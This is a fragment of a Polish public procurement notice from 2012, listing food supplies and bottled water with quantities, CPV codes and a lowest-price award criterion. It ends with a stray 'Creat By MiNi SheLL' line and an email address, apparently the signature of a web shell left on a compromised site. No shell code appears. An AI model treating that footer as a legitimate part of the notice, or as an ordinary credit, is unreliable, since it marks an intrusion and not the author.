Oliwa z oliwek z pierwszego tłoczenia , na zimno, opakowanie butelka szklana 500 ml	szt.	10,
Owoce suszone ( rodzynki, morele, śliwki, daktyle )	kg	20,
Papryka konserwowa, opakowanie - słoik 720 g	szt.	40,
Pieprz czarny mielony naturalny  - op.20g	szt.	80,
Płatki do mleka - Kwadraciki z pełnego ziarna pszenicy o smaku cynamonowym- op. 500 g - wartość energetyczna w 100g produktu 412 kcal - zawartość mąki pszennej pełnoziarnistej 31,1%, substancje wzbogacające: witamina C, niacyna, kwas pantotenowy, witaminy z grupy B, żelazo zredukowane, węglan wapnia.	szt.	30,
Płatki do mleka - Zbożowe kółeczka z miodem - op. 500 g - wartość energetyczna w 100g produktu 369 kcal, zawartość mąk pełnoziarnistych 64,6%, miodu 4,1%	szt.	30,
Płatki do mleka - Zbożowe kuleczki o smaku czekoladowym op. 500 g - wartość energetyczna w 100g produktu 379 kcal, zawartość mąki 63%, kakao 5,6%, kakao o obniżonej zawartości tłuszczu 0,5%	szt.	30,
Płatki owsiane górskie błyskawiczne - op. 400g - zawartość  energetyczna w 100g produktu 366 kcal, węglowodany przyswajalne 62,40g	szt.	20,
Ryż biały długoziarnisty - opakowanie-torba papierowa - 1kg, wartość energetyczna w 100g produktu 344kcal	kg.	100,
Sok malinowy zagęszczony, pojemność butelki szklanej 420 ml, skład: cukier lub syrop glukozowo - fruktozowy, zagęszczony sok aroniowy 65%  zagęszczony sok wiśniowy (0,25%), syrop bez konserwantów, pasteryzowany.	szt.	50,
Sok owocowy nieprzecierowy ( jabłka, pomarańcze, ananasy, winogrona, cytryny, gruszki, nektarynki, mango, morele ), opakowanie - butelka szklana o poj. 1l	szt.	300,
Sok przecierowy na bazie marchwi i owoców, opakowanie  - butelka szklana o poj. 1l	szt.	300,
Soczki owocowe w opakowaniu 0,2	szt.	500,
Szczaw konserwowy opakowanie - słoik 350 g	szt.	100,
Sól kamienna jodowana - op. 1kg	szt.	100,
Oregano , torebka 10 g	szt.	30,
Tymianek, torebka 10 g	szt.	30,
Proszek do pieczenia 15 g	szt.	25,
Wiórki kokosowe, opakowanie 100 g	szt.	5,
Ziele angielskie - op. 15g	szt.	30,
Przyprawa warzywna do potraw -sucha- warzywa suszone 15,5%, op. 200-220g	szt.	10,
Jajko czekoladowe  -szt. 20 g	szt.	200,
Przyprawa w płynie 1l	szt.	6,
Zioła do drobiu mieszanka rozmarynu, bazylii, majeranku, mięty, tymianku, szałwii, cebuli i czosnku, opakowanie - torebka 35 g	szt.	10,
Pianka w czekoladzie - op.500 g	szt.	150,
Batonik czekoladowy -szt. 50 g	    szt.	200,
Czekolada - szt. 25-30 g	szt.	250,
Cukierki miękkie op.1 kg	kg.	6,
Ciastka op.25 - 35 g	szt.	210,
Owoce suszone -chips -op 10 - 20g	szt.	250,
Żelki - op. 10 - 20 g	szt.	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> WODA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Woda mineralna w butlach o poj. 19l	szt.	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 41.11.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com